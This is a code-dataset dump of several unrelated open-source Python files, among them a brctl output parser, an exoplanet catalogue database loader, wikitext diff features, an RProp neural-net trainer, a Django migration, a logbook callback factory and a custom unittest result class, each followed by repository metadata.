{'bridge id': '8000.0242d4cf2112', 'STP enabled': 'no',
'bridge name': 'docker0'}
]
>>> brctl_info.group_by_iface
{
'docker0': {'STP enabled': 'no', 'bridge id': '8000.0242d4cf2112'},
'br2': {'interfaces': ['eth6'], 'STP enabled': 'no',
'bridge id': '8000.0800278cdb63'},
'br1': {'interfaces': ['eth4', 'eth5'], 'STP enabled': 'no',
'bridge id': '8000.0800278cdb62'},
'br0': {'interfaces': ['eth1', 'eth2', 'eth3'], 'STP enabled': 'no',
'bridge id': '8000.08002731ddfd'}
}
"""
from .. import Parser, parser
from insights.specs import brctl_show
@parser(brctl_show)
class BrctlShow(Parser):
"""
Parse the output of the command "brctl show" to get bridge
interface info table
"""
@property
def group_by_iface(self):
"""
Return a dict, key is the bridge name, the value is a dic with keys: bridge id,
STP enabled and interfaces
"""
return self._group_by_iface
def parse_content(self, content):
self._group_by_iface = {}
self.data = []
if "/usr/sbin/brctl: file not found" in content[0]:
return
elif "\t" in content[0]:
head_line = filter(None, [v.strip() for v in content[0].split('\t')])
else:
head_line = filter(None, [v.strip() for v in content[0].split(' ')])
iface = head_line[3]
for line in content[1:]:
if not line.startswith((' ', '\t')):
iface_lst = []
br_mapping = {}
br_mapping = dict(zip(head_line, line.split()))
if len(line.split()) == 4:
iface_lst.append(line.split()[3])
br_mapping[iface] = iface_lst
if br_mapping:
self.data.append(br_mapping)
else:
iface_lst.append(line.strip())
br_mapping[iface] = iface_lst
for entry in self.data:
self._group_by_iface[entry['bridge name']] = \
dict((k, v) for (k, v) in entry.iteritems() if k != 'bridge name')
return
|
apache-2.0
| -8,888,147,247,464,096,000 | 38.481132 | 87 | 0.474074 | false |
ryanvarley/ExoData
|
exodata/database.py
|
1
|
8247
|
""" Handles database classes including search functions
"""
import re
import xml.etree.ElementTree as ET
import glob
import os.path
import io
import gzip
import requests
from .astroclasses import System, Binary, Star, Planet, Parameters, BinaryParameters, StarParameters, PlanetParameters
compactString = lambda string: string.replace(' ', '').replace('-', '').lower()
class OECDatabase(object):
""" This Class Handles the OEC database including search functions.
"""
def __init__(self, databaseLocation, stream=False):
""" Holds the Open Exoplanet Catalogue database in python
:param databaseLocation: file path to the Open Exoplanet Catalogue systems folder ie
~/git/open-exoplanet-catalogue-atmospheres/systems/
get the catalogue from https://github.com/hannorein/open_exoplanet_catalogue
OR the stream object (used by load_db_from_url)
:param stream: if true treats the databaseLocation as a stream object
"""
self._loadDatabase(databaseLocation, stream)
self._planetSearchDict = self._generatePlanetSearchDict()
self.systemDict = dict((system.name, system) for system in self.systems)
self.binaryDict = dict((binary.name, binary) for binary in self.binaries)
self.starDict = dict((star.name, star) for star in self.stars)
self.planetDict = dict((planet.name, planet) for planet in self.planets)
def __repr__(self):
return 'OECDatabase({} Systems, {} Binaries, {} Stars, {} Planets)'.format(len(self.systems), len(self.binaries),
len(self.stars), len(self.planets))
def searchPlanet(self, name):
""" Searches the database for a planet. Input can be complete ie GJ1214b, alternate name variations or even
just 1214.
:param name: the name of the planet to search
:return: dictionary of results as planetname -> planet object
"""
searchName = compactString(name)
returnDict = {}
for altname, planetObj in self._planetSearchDict.iteritems():
if re.search(searchName, altname):
returnDict[planetObj.name] = planetObj
if returnDict:
if len(returnDict) == 1:
return returnDict.values()[0]
else:
return returnDict.values()
else:
return False
@property
def transitingPlanets(self):
""" Returns a list of transiting planet objects
"""
transitingPlanets = []
for planet in self.planets:
try:
if planet.isTransiting:
transitingPlanets.append(planet)
except KeyError: # No 'discoverymethod' tag - this also filters Solar System planets
pass
return transitingPlanets
def _generatePlanetSearchDict(self):
""" Generates a search dictionary for planets by taking all names and 'flattening' them to the most compact form
(lowercase, no spaces and dashes)
"""
planetNameDict = {}
for planet in self.planets:
name = planet.name
altnames = planet.params['altnames']
altnames.append(name) # as we also want the default name to be searchable
for altname in altnames:
reducedname = compactString(altname)
planetNameDict[reducedname] = planet
return planetNameDict
def _loadDatabase(self, databaseLocation, stream=False):
""" Loads the database from a given file path in the class
:param databaseLocation: the location on disk or the stream object
:param stream: if true treats the databaseLocation as a stream object
"""
# Initialise Database
self.systems = []
self.binaries = []
self.stars = []
self.planets = []
if stream:
tree = ET.parse(databaseLocation)
for system in tree.findall(".//system"):
self._loadSystem(system)
else:
databaseXML = glob.glob(os.path.join(databaseLocation, '*.xml'))
if not len(databaseXML):
raise LoadDataBaseError('could not find the database xml files. Have you given the correct location '
'to the open exoplanet catalogues /systems folder?')
for filename in databaseXML:
try:
with open(filename, 'r') as f:
tree = ET.parse(f)
except ET.ParseError as e: # this is sometimes raised rather than the root.tag system check
raise LoadDataBaseError(e)
root = tree.getroot()
# Process the system
if not root.tag == 'system':
raise LoadDataBaseError('file {0} does not contain a valid system - could be an error with your version'
' of the catalogue'.format(filename))
self._loadSystem(root)
def _loadSystem(self, root):
systemParams = Parameters()
for systemXML in root:
tag = systemXML.tag
text = systemXML.text
attrib = systemXML.attrib
systemParams.addParam(tag, text, attrib)
system = System(systemParams.params)
self.systems.append(system) # Add system to the index
self._loadBinarys(root, system)
self._loadStars(root, system)
def _loadBinarys(self, parentXML, parent):
binarysXML = parentXML.findall("binary")
for binaryXML in binarysXML:
binaryParams = BinaryParameters()
for value in binaryXML:
tag = value.tag
text = value.text
attrib = value.attrib
binaryParams.addParam(tag, text, attrib)
binary = Binary(binaryParams.params)
binary.parent = parent
parent._addChild(binary) # Add star to the system
self._loadBinarys(binaryXML, binary)
self._loadStars(binaryXML, binary)
self._loadPlanets(binaryXML, binary) # Load planets
self.binaries.append(binary) # Add star to the index
def _loadStars(self, parentXML, parent):
starsXML = parentXML.findall("star")
for starXML in starsXML:
starParams = StarParameters()
for value in starXML:
tag = value.tag
text = value.text
attrib = value.attrib
starParams.addParam(tag, text, attrib)
star = Star(starParams.params)
star.parent = parent
parent._addChild(star) # Add star to the system
self._loadPlanets(starXML, star) # Load planets
self.stars.append(star) # Add star to the index
def _loadPlanets(self, parentXML, parent):
planetsXML = parentXML.findall("planet")
for planetXML in planetsXML:
planetParams = PlanetParameters()
for value in planetXML:
tag = value.tag
text = value.text
attrib = value. attrib
planetParams.addParam(tag, text, attrib)
planet = Planet(planetParams.params)
planet.parent = parent
parent._addChild(planet) # Add planet to the star
self.planets.append(planet) # Add planet to the index
def load_db_from_url(url="https://github.com/OpenExoplanetCatalogue/oec_gzip/raw/master/systems.xml.gz"):
""" Loads the database from a gzipped version of the system folder, by default the one located in the oec_gzip repo
in the OpenExoplanetCatalogue GitHub group.
The database is loaded from the url in memory
:param url: url to load (must be gzipped version of systems folder)
:return: OECDatabase objected initialised with latest OEC Version
"""
catalogue = gzip.GzipFile(fileobj=io.BytesIO(requests.get(url).content))
database = OECDatabase(catalogue, stream=True)
return database
class LoadDataBaseError(IOError):
pass
|
mit
| -7,449,412,430,742,709,000 | 32.528455 | 124 | 0.602037 | false |
yafeunteun/wikipedia-spam-classifier
|
revscoring/revscoring/features/wikitext/datasources/edit.py
|
1
|
10052
|
import logging
import re
import time
from deltas import segment_matcher
from ....datasources import Datasource
from ....datasources.meta import filters
from .tokenized import TokenIsInTypes, is_uppercase_word
logger = logging.getLogger(__name__)
class Diff:
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.operations = Datasource(
self._name + ".operations", _process_operations,
depends_on=[self.revision.parent.tokens,
self.revision.tokens]
)
"""
Returns a tuple that describes the difference between the parent
revision text and the current revision's text.
The tuple contains three fields:
* operations: `list` of :class:`deltas.Operation`
* A tokens: `list` of `str`
* B tokens: `list` of `str`
"""
self.segments_added = Datasource(
self._name + ".segments_added", _process_segments_added,
depends_on=[self.operations]
)
"""
Returns a list of all contiguous segments of tokens added in this
revision.
"""
self.segments_removed = Datasource(
self._name + ".segments_removed", _process_segments_removed,
depends_on=[self.operations]
)
"""
Returns a list of all contiguous segments of tokens removed in this
revision.
"""
self.tokens_added = Datasource(
self._name + ".tokens_added", _process_tokens_added,
depends_on=[self.operations]
)
"""
Constructs a :class:`revscoring.Datasource` that returns a list of all
tokens added in this revision.
"""
self.tokens_removed = Datasource(
self._name + ".tokens_removed", _process_tokens_removed,
depends_on=[self.operations]
)
"""
Constructs a :class:`revscoring.Datasource` that returns a list of all
tokens removed in this revision.
"""
self.numbers_added = self.tokens_added_in_types(
{'number'}, name=self._name + ".numbers_added"
)
"""
A list of numeric tokens added in the edit
"""
self.numbers_removed = self.tokens_removed_in_types(
{'number'}, name=self._name + ".numbers_removed"
)
"""
A list of numeric tokens removed in the edit
"""
self.whitespaces_added = self.tokens_added_in_types(
{'whitespace'}, name=self._name + ".whitespaces_added"
)
"""
A list of whitespace tokens added in the edit
"""
self.whitespaces_removed = self.tokens_removed_in_types(
{'whitespace'}, name=self._name + ".whitespaces_removed"
)
"""
A list of whitespace tokens removed in the edit
"""
self.markups_added = self.tokens_added_in_types(
{'dbrack_open', 'dbrack_close', 'brack_open', 'brack_close',
'tab_open', 'tab_close', 'dcurly_open', 'dcurly_close',
'curly_open', 'curly_close', 'bold', 'italics', 'equals'},
name=self._name + ".markups_added"
)
"""
A list of markup tokens added in the edit
"""
self.markups_removed = self.tokens_removed_in_types(
{'dbrack_open', 'dbrack_close', 'brack_open', 'brack_close',
'tab_open', 'tab_close', 'dcurly_open', 'dcurly_close',
'curly_open', 'curly_close', 'bold', 'italics', 'equals'},
name=self._name + ".markups_removed"
)
"""
A list of markup tokens removed in the edit
"""
self.cjks_added = self.tokens_added_in_types(
{'cjk'}, name=self._name + ".cjks_added"
)
"""
A list of Chinese/Japanese/Korean tokens added in the edit
"""
self.cjks_removed = self.tokens_removed_in_types(
{'cjk'}, name=self._name + ".cjks_removed"
)
"""
A list of Chinese/Japanese/Korean tokens removed in the edit
"""
self.entities_added = self.tokens_added_in_types(
{'entity'}, name=self._name + ".entities_added"
)
"""
A list of HTML entity tokens added in the edit
"""
self.entities_removed = self.tokens_removed_in_types(
{'entity'}, name=self._name + ".entities_removed"
)
"""
A list of HTML entity tokens removed in the edit
"""
self.urls_added = self.tokens_added_in_types(
{'url'}, name=self._name + ".urls_added"
)
"""
A list of URL tokens rempved in the edit
"""
self.urls_removed = self.tokens_removed_in_types(
{'url'}, name=self._name + ".urls_removed"
)
"""
A list of URL tokens added in the edit
"""
self.words_added = self.tokens_added_in_types(
{'word'}, name=self._name + ".words_added"
)
"""
A list of word tokens added in the edit
"""
self.words_removed = self.tokens_removed_in_types(
{'word'}, name=self._name + ".words_removed"
)
"""
A list of word tokens removed in the edit
"""
self.uppercase_words_added = filters.filter(
is_uppercase_word, self.words_added,
name=self._name + ".uppercase_words_added"
)
"""
A list of fully UPPERCASE word tokens added in the edit
"""
self.uppercase_words_removed = filters.filter(
is_uppercase_word, self.words_removed,
name=self._name + ".uppercase_words_removed"
)
"""
A list of fully UPPERCASE word tokens removed in the edit
"""
self.punctuations_added = self.tokens_added_in_types(
{'period', 'qmark', 'epoint', 'comma', 'colon', 'scolon',
'japan_punct'},
name=self._name + ".punctuations_added"
)
"""
A list of punctuation tokens added in the edit
"""
self.punctuations_removed = self.tokens_removed_in_types(
{'period', 'qmark', 'epoint', 'comma', 'colon', 'scolon',
'japan_punct'},
name=self._name + ".punctuations_removed"
)
"""
A list of punctuation tokens removed in the edit
"""
self.breaks_added = self.tokens_added_in_types(
{'break'},
name=self._name + ".breaks_added"
)
"""
A list of break tokens added in the edit
"""
self.breaks_removed = self.tokens_removed_in_types(
{'break'},
name=self._name + ".breaks_removed"
)
"""
A list of break tokens removed in the edit
"""
def tokens_added_matching(self, regex, name=None, regex_flags=re.I):
"""
Constructs a :class:`revscoring.Datasource` that represents tokens
added that match a regular expression.
"""
if not hasattr(regex, "pattern"):
regex = re.compile(regex, regex_flags)
if name is None:
name = "{0}({1})".format(self._name + ".tokens_added_matching",
regex.pattern)
return filters.regex_matching(regex, self.tokens_added, name=name)
def tokens_removed_matching(self, regex, name=None, regex_flags=re.I):
"""
Constructs a :class:`revscoring.Datasource` that represents tokens
removed that match a regular expression.
"""
if not hasattr(regex, "pattern"):
regex = re.compile(regex, regex_flags)
if name is None:
name = "{0}({1})" \
.format(self._name + ".tokens_removed_matching",
regex.pattern)
return filters.regex_matching(regex, self.tokens_removed, name=name)
def tokens_added_in_types(self, types, name=None):
"""
Constructs a :class:`revscoring.Datasource` that represents tokens
added that are within a set of types.
"""
types = set(types)
if name is None:
name = "{0}({1})".format(self._name + ".tokens_added_in_types",
types)
return filters.filter(TokenIsInTypes(types).filter, self.tokens_added,
name=name)
def tokens_removed_in_types(self, types, name=None):
"""
Constructs a :class:`revscoring.Datasource` that represents tokens
removed that are within a set of types.
"""
types = set(types)
if name is None:
name = "{0}({1})".format(self._name + ".tokens_removed_in_types",
types)
return filters.filter(TokenIsInTypes(types).filter,
self.tokens_removed, name=name)
def _process_operations(a, b):
start = time.time()
operations = [op for op in segment_matcher.diff(a, b)]
logger.debug("diff() of {0} and {1} tokens took {2} seconds."
.format(len(a), len(b), time.time() - start))
return operations, a, b
def _process_segments_added(diff_operations):
operations, a, b = diff_operations
return ["".join(b[op.b1:op.b2])
for op in operations
if op.name == "insert"]
def _process_segments_removed(revision_diff):
operations, a, b = revision_diff
return ["".join(a[op.a1:op.a2])
for op in operations
if op.name == "delete"]
def _process_tokens_removed(diff_operations):
operations, a, b = diff_operations
return [t for op in operations
if op.name == "delete"
for t in a[op.a1:op.a2]]
def _process_tokens_added(diff_operations):
operations, a, b = diff_operations
return [t for op in operations
if op.name == "insert"
for t in b[op.b1:op.b2]]
|
mit
| -7,961,771,865,106,505,000 | 31.217949 | 78 | 0.544369 | false |
daanwierstra/pybrain
|
pybrain/supervised/trainers/rprop.py
|
1
|
2363
|
# $Id$
__author__ = 'Martin Felder'
from scipy import sqrt
from pybrain.supervised.trainers import BackpropTrainer
class RPropMinusTrainer(BackpropTrainer):
""" Train the parameters of a module according to a supervised dataset (possibly sequential)
by RProp without weight backtracking (aka RProp-, cf. [Igel&Huesken, Neurocomputing 50, 2003])
and without ponderation, ie. all training samples have the same weight. """
def __init__(self, module, etaminus = 0.5, etaplus = 1.2, deltamin = 1.0e-6, deltamax = 5.0, delta0 = 0.1, **kwargs):
""" Set up training algorithm parameters, and objects associated with the trainer.
@param module: the module whose parameters should be trained.
@param etaminus: factor by which step width is decreased when overstepping (0.5)
@param etaplus: factor by which step width is increased when following gradient (1.2)
@param delta: step width for each weight
@param deltamin: minimum step width (1e-6)
@param deltamax: maximum step width (5.0)
@param delta0: initial step width (0.1)
"""
BackpropTrainer.__init__(self, module, **kwargs)
self.epoch = 0
# set descender to RPROP mode and update parameters
self.descent.rprop = True
self.descent.etaplus = etaplus
self.descent.etaminus = etaminus
self.descent.deltamin = deltamin
self.descent.deltamax = deltamax
self.descent.deltanull = delta0
self.descent.init(module.params) # reinitialize, since mode changed
def train(self):
""" Train the network for one epoch """
self.module.resetDerivatives()
errors = 0
ponderation = 0
for seq in self.ds._provideSequences():
e, p = self._calcDerivs(seq)
errors += e
ponderation += p
if self.verbose:
print "epoch %6d total error %12.5g avg weight %12.5g" % (self.epoch, errors/ponderation,
sqrt((self.module.params**2).mean()))
self.module._setParameters(self.descent(self.module.derivs - self.weightdecay*self.module.params))
self.epoch += 1
self.totalepochs += 1
return errors/ponderation
|
bsd-3-clause
| -2,108,311,514,443,129,300 | 44.461538 | 121 | 0.614896 | false |
matllubos/django-is-core
|
is_core/contrib/background_export/migrations/0001_initial.py
|
1
|
2183
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.16 on 2019-08-18 18:10
from __future__ import unicode_literals
import import_string
import chamber.models.fields
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import is_core.contrib.background_export.models
from is_core.config import settings as is_core_settings
class Migration(migrations.Migration):
initial = True
dependencies = [
('contenttypes', '0002_remove_content_type_name'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='ExportedFile',
fields=[
('created_at', models.DateTimeField(auto_now_add=True, db_index=True, verbose_name='created at')),
('changed_at', models.DateTimeField(auto_now=True, db_index=True, verbose_name='changed at')),
('slug', models.SlugField(max_length=32, primary_key=True, serialize=False, verbose_name='slug')),
('file', chamber.models.fields.FileField(
blank=True, null=True, upload_to=is_core.contrib.background_export.models.generate_filename,
verbose_name='file', storage=import_string(is_core_settings.BACKGROUND_EXPORT_STORAGE_CLASS)()
)),
('content_type',
models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='contenttypes.ContentType')),
('created_by',
models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='created_exported_files',
to=settings.AUTH_USER_MODEL, verbose_name='created by')),
('downloaded_by', models.ManyToManyField(blank=True, related_name='downloaded_exported_files',
to=settings.AUTH_USER_MODEL, verbose_name='downloaded by')),
],
options={
'verbose_name': 'exported file',
'verbose_name_plural': 'exported files',
'ordering': ('-created_at',),
},
),
]
|
bsd-3-clause
| -1,149,813,004,629,702,500 | 44.479167 | 118 | 0.603298 | false |
ericdill/bluesky
|
bluesky/callbacks/olog.py
|
1
|
4145
|
from io import StringIO
TEMPLATES = {}
TEMPLATES['long'] = """
{{- start.plan_type }} ['{{ start.uid[:6] }}'] (scan num: {{ start.scan_id }})
Scan Plan
---------
{{ start.plan_type }}
{%- for k, v in start.plan_args | dictsort %}
{{ k }}: {{ v }}
{%- endfor %}
{% if 'signature' in start -%}
Call:
{{ start.signature }}
{% endif %}
Metaadata
---------
{% for k, v in start.items() -%}
{%- if k not in ['plan_type', 'plan_args'] -%}{{ k }} : {{ v }}
{% endif -%}
{%- endfor -%}"""
TEMPLATES['desc'] = """
{{- start.plan_type }} ['{{ start.uid[:6] }}'] (scan num: {{ start.scan_id }})"""
TEMPLATES['call'] = """RE({{ start.plan_type }}(
{%- for k, v in start.plan_args.items() %}{%- if not loop.first %} {% endif %}{{ k }}={{ v }}
{%- if not loop.last %},
{% endif %}{% endfor %}))
"""
def logbook_cb_factory(logbook_func, desc_template=None, long_template=None):
"""Create a logbook run_start callback
The returned function is suitable for registering as
a 'start' callback on the the BlueSky run engine.
Parameters
----------
logbook_func : callable
The required signature is ::
def logbok_func(text=None, logbooks=None, tags=None, properties=None,
attachments=None, verify=True, ensure=False):
'''
Parameters
----------
text : string
The body of the log entry.
logbooks : string or list of strings
The logbooks which to add the log entry to.
tags : string or list of strings
The tags to add to the log entry.
properties : dict of property dicts
The properties to add to the log entry
attachments : list of file like objects
The attachments to add to the log entry
verify : bool
Check that properties, tags and logbooks are in the Olog
instance.
ensure : bool
If a property, tag or logbook is not in the Olog then
create the property, tag or logbook before making the log
s entry. Seting ensure to True will set verify to False.
'''
pass
This matches the API on `SimpleOlogClient.log`
"""
import jinja2
env = jinja2.Environment()
if long_template is None:
long_template = TEMPLATES['long']
if desc_template is None:
desc_template = TEMPLATES['desc']
# It seems that the olog only has one text field, which it calls
# `text` on the python side and 'description' on the olog side.
# There are some CSS applications that try to shove the entire
# thing into a single line. We work around this by doing two
# strings, a long one which will get put in a as an attachment
# and a short one to go in as the 'text' which will be used as the
# description
long_msg = env.from_string(long_template)
desc_msg = env.from_string(desc_template)
def lbcb(name, doc):
# This only applies to 'start' Documents.
if name != 'start':
return
atch = StringIO(long_msg.render(start=doc))
desc = desc_msg.render(start=doc)
logbook_func(text=desc, properties={'start':doc},
attachments=[atch],
ensure=True)
return lbcb
def call_str(start, call_template=None):
"""Given a start document generate an evalable call scring
The default template assumes that `plan_args` and `plan_type`
are at the top level of the document.
Parameter
---------
start : dict
A document which follows the runstart schema
call_template : str, optional
A jinja2 template rendered with `cr.render(start=start)`
If not provided defaults to `CALL_TEMPLATE`
"""
import jinja2
env = jinja2.Environment()
if call_template is None:
call_template = TEMPLATES['call']
call_renderer = env.from_string(call_template)
return call_renderer.render(start=start)
|
bsd-3-clause
| -4,276,932,804,570,947,600 | 32.97541 | 95 | 0.572256 | false |
jonesambrosi/rocks
|
test_rocks/custom_report.py
|
1
|
2457
|
import logging
from unittest import TestResult
logger = logging.getLogger(__name__)
class CustomTestReport(TestResult):
def __init__(self, change_callback=None):
super(CustomTestReport, self).__init__()
logger.debug('__init__')
self.running = False
self.change_callback = change_callback
self.success = 0
def startTest(self, test):
super(CustomTestReport, self).startTest(test)
logger.debug('startTest')
self.running = True
if self.change_callback:
self.change_callback({
"errors": len(self.errors),
"failures": len(self.failures),
"skipped": len(self.skipped),
"expectedFailures": len(self.expectedFailures),
"unexpectedSuccesses": len(self.unexpectedSuccesses),
"testsRun": self.testsRun,
"success": self.success
})
def stopTest(self, test):
super(CustomTestReport, self).stopTest(test)
logger.debug("stopTest %s", test)
self.running = False
def startTestRun(self):
super(CustomTestReport, self).startTestRun()
logger.debug("startTestRun")
self.running = True
def stopTestRun(self):
super(CustomTestReport, self).stopTestRun()
logger.debug("stopTestRun")
self.running = False
def addError(self, test, err):
super(CustomTestReport, self).addError(test, err)
logger.debug("[E] %s %s", test, err)
def addFailure(self, test, err):
super(CustomTestReport, self).addFailure(test, err)
logger.debug("[F] %s %s", test, err)
def addSuccess(self, test):
super(CustomTestReport, self).addSuccess(test)
logger.debug("[S] %s", test)
self.success += 1
def addSkip(self, test, reason):
super(CustomTestReport, self).addSkip(test, reason)
logger.debug("[s] %s %s", test, reason)
def addExpectedFailure(self, test, err):
super(CustomTestReport, self).addExpectedFailure(test, err)
logger.debug("[EF] %s %s", test, err)
def addUnexpectedSuccess(self, test):
super(CustomTestReport, self).addUnexpectedSuccess(test)
logger.debug("[US] %s", test)
def addSubTest(self, test, subtest, outcome):
super(CustomTestReport, self).addSubTest(test, subtest, outcome)
logger.debug("[ST] %s %s %s", test, subtest, outcome)
|
mit
| 3,235,002,747,849,012,000 | 32.657534 | 72 | 0.611315 | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.